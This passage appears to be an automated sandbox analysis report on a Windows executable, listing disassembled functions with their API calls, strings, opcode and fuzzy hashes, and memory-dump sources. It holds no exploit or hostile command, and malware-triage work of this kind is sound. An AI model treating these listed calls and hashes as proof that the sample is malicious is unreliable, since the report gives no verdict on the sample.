                                                                                              • Opcode ID: 3fec256835abfe76f9dd2baca413ec1bf0a9ba5d995b910d86c75352745f066b
                                                                                              • Instruction ID: 61d6f2e31430bd4866626be5f786060b7638283aa03988e40a0915474bac4412
                                                                                              • Opcode Fuzzy Hash: 3fec256835abfe76f9dd2baca413ec1bf0a9ba5d995b910d86c75352745f066b
                                                                                              • Instruction Fuzzy Hash: D291C6B2248348BFD3319BA0DD89FFB77ACEB4A705F040819F789D6481D7759A058B62
                                                                                              Function 000F718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F7191
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 000F72F1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 000F7301
                                                                                                • Part of subcall function 000F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 000F7C04
                                                                                                • Part of subcall function 000F7BF5: GetLastError.KERNEL32 ref: 000F7C4A
                                                                                                • Part of subcall function 000F7BF5: CloseHandle.KERNEL32(?), ref: 000F7C59
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 000F730C
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000F741A
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 000F7446
                                                                                              • CloseHandle.KERNEL32(?), ref: 000F7457
                                                                                              • GetLastError.KERNEL32 ref: 000F7467
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 000F74B3
                                                                                              • DeleteFileW.KERNEL32(?), ref: 000F74DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3935142422-3508440684
                                                                                              • Opcode ID: baa59114c63d5a5262c6ffa695c11d02184fe6b8fe775f79596edf488a8c61ad
                                                                                              • Instruction ID: dccf850eb25b8f95929462e37fab305dc4cf49f6710bc5f996d0218d1c2d5005
                                                                                              • Opcode Fuzzy Hash: baa59114c63d5a5262c6ffa695c11d02184fe6b8fe775f79596edf488a8c61ad
                                                                                              • Instruction Fuzzy Hash: F8B10271904219EBDF21DB64DC41BFE77B8EF44300F044069FA49E7582D774AA89DB61
                                                                                              Function 000F3281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_memcmp
                                                                                              • String ID: CMT$h%u$hc%u
                                                                                              • API String ID: 3004599000-3282847064
                                                                                              • Opcode ID: cf665df2a1a83c97b3459d8039927ff8480eeb32cd3e0feb2540abffc2d51a75
                                                                                              • Instruction ID: 85bf90f4b3fa285f26542dd9529a7acfe716a89e76dabcb18dafdc7b475a6ee2
                                                                                              • Opcode Fuzzy Hash: cf665df2a1a83c97b3459d8039927ff8480eeb32cd3e0feb2540abffc2d51a75
                                                                                              • Instruction Fuzzy Hash: 23328D715142889BDB14DF64C886AFA37E5AF54310F04447AFE8ACB683DB74AA48DB60
                                                                                              Function 0011D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: f28462ea6a1de31dfce7aca08c197674fb6bc5bee89d63fc5b4389a195ebb3de
                                                                                              • Instruction ID: a5ab276aa1832cbcd747642c3505dc94d2972ce7dd1fcdeb5c7d5e8a4533c63a
                                                                                              • Opcode Fuzzy Hash: f28462ea6a1de31dfce7aca08c197674fb6bc5bee89d63fc5b4389a195ebb3de
                                                                                              • Instruction Fuzzy Hash: 11C23A71E086298FDB29CE68ED407EAB7B5EB84305F1545EAD84DE7240E774AEC18F40
                                                                                              Function 000F27E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F27F1
                                                                                              • _strlen.LIBCMT ref: 000F2D7F
                                                                                                • Part of subcall function 0010137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000FB652,00000000,?,?,?,00010412), ref: 00101396
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F2EE0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1706572503-2756464174
                                                                                              • Opcode ID: 3147b30bfa9753cc624e94513dd5d974b0d9d69d5fbd7ffea047f293ff4037fc
                                                                                              • Instruction ID: ade0751f2eefda3f94d8073231a583be7463e37c81dbfa37d1743a0d11eb77b0
                                                                                              • Opcode Fuzzy Hash: 3147b30bfa9753cc624e94513dd5d974b0d9d69d5fbd7ffea047f293ff4037fc
                                                                                              • Instruction Fuzzy Hash: 766207715046488FDF28DF34C986AFA3BE1AF54300F04457DEE9A8BA82DB74A985DB50
                                                                                              Function 0011866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00118767
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00118771
                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0011877E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 46f86e40bdd52bd3850a523c25e2d73a7d340fb50ab6be5408ea68e09713c28c
                                                                                              • Instruction ID: 63012c9661d9db4a294968dc5ff25f860f000b9dcc1b966e5f608af5b2052aa4
                                                                                              • Opcode Fuzzy Hash: 46f86e40bdd52bd3850a523c25e2d73a7d340fb50ab6be5408ea68e09713c28c
                                                                                              • Instruction Fuzzy Hash: 3631C475901228ABCB25DF24D889BDCB7B4BF18310F5041EAE81CA7290EB749B958F44
                                                                                              Function 0011CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                                                                              • Instruction ID: a951d7795cee1a24e02800785a344e50c728d080d62a7f1f5e723482db017f9e
                                                                                              • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                                                                              • Instruction Fuzzy Hash: F4022C71E412199BDF18CFA9D8806EEBBF1EF88314F25416AE919E7384D731AD41CB84
                                                                                              Function 0010A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0010A662
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0012E600,?,?), ref: 0010A6B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: 0d632867f347bf12ac94fa9ac52883cc77b99bc2fa24e9a22a435a663eb9fe83
                                                                                              • Instruction ID: ce0c850f2a4b0d90011997a50fafee063304f0b703ec0cd40e13ab0764821102
                                                                                              • Opcode Fuzzy Hash: 0d632867f347bf12ac94fa9ac52883cc77b99bc2fa24e9a22a435a663eb9fe83
                                                                                              • Instruction Fuzzy Hash: EB015A76100208BEDB208FA4EC45FAB77FCFF19710F004422BA04A76A0D3709A658BA5
                                                                                              Function 000F6EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(0010117C,?,00000200), ref: 000F6EC9
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 000F6EEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: cc076e0b7aefff52a3eb7d241429884a40080b9c5a1eb5431eb604ce7cb6621a
                                                                                              • Instruction ID: 4d996b8051657aa9c7657ca248552d2503d58213def29b1a4364000f0c42cefd
                                                                                              • Opcode Fuzzy Hash: cc076e0b7aefff52a3eb7d241429884a40080b9c5a1eb5431eb604ce7cb6621a
                                                                                              • Instruction Fuzzy Hash: A8D0C7363C4306BFEA610A74CC05F3B7B946755B42F108514B366D98D0C5719065A62D
                                                                                              Function 00121194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0012118F,?,?,00000008,?,?,00120E2F,00000000), ref: 001213C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 12a725e0b7e4a0e53915c0ac57e9957cf3482ecf492bea40392329c2f0dbb1d8
                                                                                              • Instruction ID: a596018aaea2e812c78a36df20726393285b5c14709e6a2b8404e955bed5431c
                                                                                              • Opcode Fuzzy Hash: 12a725e0b7e4a0e53915c0ac57e9957cf3482ecf492bea40392329c2f0dbb1d8
                                                                                              • Instruction Fuzzy Hash: 43B18E31610618EFD719CF28D48ABA57BE1FF15364F258658E8D9CF2A1C335E9A2CB40
                                                                                              Function 000F407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              • Opcode ID: 6c8af391875e91be7765e91d9c8218df721645f3c9d3f4bc557e5953dbf0e739
                                                                                              • Instruction ID: 508e3347a655f7ca974d3651c6826299a7ca546fcca19cf3080998df9aa2e326
                                                                                              • Opcode Fuzzy Hash: 6c8af391875e91be7765e91d9c8218df721645f3c9d3f4bc557e5953dbf0e739
                                                                                              • Instruction Fuzzy Hash: 19F1B3B1A083418FD748CF29D880A1AFBE1BFCC208F15896EF598D7711E734EA558B56
                                                                                              Function 000FACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 000FAD1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              • Opcode ID: 6e238a1752417a1309f45fc62e66f7aacc4a40470e2052dda0096a537fd299fa
                                                                                              • Instruction ID: ad34e7b532305e208fbf7c64a8094eb27d6b222fe522db8775e9f1be5638cf75
                                                                                              • Opcode Fuzzy Hash: 6e238a1752417a1309f45fc62e66f7aacc4a40470e2052dda0096a537fd299fa
                                                                                              • Instruction Fuzzy Hash: 3EF0F9B0A0020C8FC738CB28EC516E973E9B759711F200295EA1943F54D370A9819E65
                                                                                              Function 0010F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0010EAC5), ref: 0010F068
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: e80671323dc467e7c90f8f06b88e960ca39106a255d0dab07e19945ca253bc96
                                                                                              • Instruction ID: 3ed1c77265ee8b4febe85629bf3311cd19f4d4345b9fce96095a6301d4f2fb15
                                                                                              • Opcode Fuzzy Hash: e80671323dc467e7c90f8f06b88e960ca39106a255d0dab07e19945ca253bc96
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 0011B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 329ff8acf9fb1a466b43cdf4f6e43bdc33fba0f1cb5cb4f3b69ed8b2648073cc
                                                                                              • Instruction ID: df876fce51f5b9f3366723fefb03d4f9ada65dd7646bb78dfe018e281bfe60d3
                                                                                              • Opcode Fuzzy Hash: 329ff8acf9fb1a466b43cdf4f6e43bdc33fba0f1cb5cb4f3b69ed8b2648073cc
                                                                                              • Instruction Fuzzy Hash: F3A011B0200200EF83008F32AA0830A3AA8AB002823088228A008CA820EA2880B08F00
                                                                                              Function 00105C77 Relevance: .8, Instructions: 800COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                                                                              • Instruction ID: 81e93a4f12bc2af00d2298141c805f377900733362602835ce7f82e45066916c
                                                                                              • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                                                                              • Instruction Fuzzy Hash: 52621971604B899FCB29CF38C8906BABBE1AF55304F04C56DD8DA8B386D7B4E955CB10
                                                                                              Function 001070BF Relevance: .8, Instructions: 773COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                                                              • Instruction ID: f58c76883ffe3ab055c4eece95c9ecd8e84059fe1f79f12a35864f3b2777a68b
                                                                                              • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                                                                              • Instruction Fuzzy Hash: 64620370A0878A9FC719CF28C8905B9BBE1BB55304F14866EE8D6877C2D770F956CB80
                                                                                              Function 000FED14 Relevance: .7, Instructions: 694COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
